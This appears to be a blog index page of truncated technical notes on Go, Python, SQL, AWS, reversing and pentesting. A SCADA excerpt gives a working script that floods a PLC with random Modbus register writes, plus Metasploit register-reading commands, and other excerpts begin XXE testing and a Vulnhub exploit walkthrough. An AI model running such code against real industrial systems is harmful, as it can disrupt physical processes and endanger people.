Golang Notes

This will encompass things that I find useful and end up looking up later when I haven’t written go in a while.

Installation

Ubuntu

dl_link='https://dl.google.com/go/go1.15.7.linux-amd64.tar.gz'
wget -c $dl_link -O - | sudo tar -xz -C /usr/local
echo "" >> ~/.bashrc
echo '# Golang exports' >> ~/.bashrc
echo 'export PATH="$PATH:/usr/local/go/bin"' >> ~/.bashrc
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc
# Test:
go version

Resource: https://golang.org/doc/install

Start New Project

This will create the project:...

June 18, 2018 · Jayson Grace

Reversing Notes

Environment Setup

VMWare everything in a VLAN.
Remnux linux box - has things like iptables rules which accept traffic from any ip that connects to it and a fake dns tool.

Process Monitor

Useful for seeing what processes are spawned with a given running program. Used to get real-time information. Process hacker is an open source alternative.

Process Explorer

Determine what files, DLLs, and registry keys are associated with open processes....

April 24, 2018 · Jayson Grace

Interfacing with Oracle DBs

This was so much of a pain in the ass to figure out that I decided that I would compile a whole post specifically around useful information for this topic. To get started, download SQLDeveloper through Oracle’s site (you’ll need to register). So far I’ve tested this on OSX.

Establishing a connection

1. Under the Connections tab, click the green plus button
2. Specify Basic for the connection type
3. Put in the Connection name, Username, Password, Hostname, and Port
4. For SID, put in the hostname without the domain....

April 19, 2018 · Jayson Grace

SCADA Security Notes

Modbus

Write random registers

from pymodbus.client.sync import ModbusTcpClient
import multiprocessing
import random
from multiprocessing import TimeoutError

client = ModbusTcpClient('[target]')
client.connect()

def write(reg):
    client.write_register(reg+1, random.randint(1, 100))
    print('reg:' + str(reg))

if __name__ == '__main__':
    while True:
        p = multiprocessing.Pool(2)
        try:
            p.map(write, [x for x in range(20)])
        except TimeoutError:
            pass
        except Exception as e:
            print(e)
            exit()
    client.close()

Read and write data to a PLC with metasploit

use auxiliary/scanner/scada/modbusclient
set DATA_ADDRESS 1
set RHOST [target]
set ACTION READ_REGISTERS
set NUMBER 19
run

April 7, 2018 · Jayson Grace

Python Notes

This will encompass things that I find useful and end up looking up later when I haven’t coded in a while.

Useful functions

Read file line-by-line and print each line

def print_lines(file):
    with open(file) as f:
        for line in f:
            print(line)

Read file into list

def return_list(file):
    with open(file) as f:
        list = f.readlines()
    return list

Remove line from a file containing a specified string

def remove_line_containing_string(file):
    f = open(file, 'r')
    contents = f....

January 3, 2018 · Jayson Grace

SQL Cheatsheet

Generic

Update field

UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition;

Get first row of data from table

SELECT * FROM <table_name> LIMIT 1;

Single-line comment

-- stuff to comment out

Multi-line comment

/** stuff to comment out **/

Delete the last n rows from a table

DELETE FROM `table` WHERE `table`.`tableID` in (SELECT TOP 500 tableID FROM table ORDER BY tableID DESC)

Delete the first n rows from a table

DELETE FROM `table` WHERE `table`....

November 29, 2017 · Jayson Grace

Modernizing Techvomit

In case it wasn’t obvious, this site runs on Ghost. I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result....

October 2, 2017 · Jayson Grace

AWS Cheatsheet

This contains various commands and information that I find useful for AWS work.

Install latest version of AWS CLI on linux

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

Resource: https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html

Backup instance via UI

1. Go to your instance
2. Right click and select Image from the dropdown
3. Click Create Image
4. Give your backup a name and description
5. Click No reboot if you want your instance to stay in a running state
6. Click Create Image

At this point you should be able to find the AMI that is associated with your backup under AMIs....

September 26, 2017 · Jayson Grace

Web Application Penetration Testing Notes

XXE

Valid use case

This is a nonmalicious example of how external entities are used:

<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [
<!ELEMENT copyright (#PCDATA)>
<!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml">
]>
<copyright>&c;</copyright>

Resource: https://xmlwriter.net/xml_guide/entity_declaration.shtml

Testing methodology

Once you’ve intercepted the POST to the vulnerable page, see if you can get the system to do what it would normally, but with entities:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!...

September 19, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM.

Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities.

Observe /license.txt - it will inform us that the target web application is running BuilderEngine.

Search for an exploit we can use:

searchsploit builderengine

View the source for the exploit:

searchsploit -x 40390

Copy the exploit code into exploit....

March 27, 2017 · Jayson Grace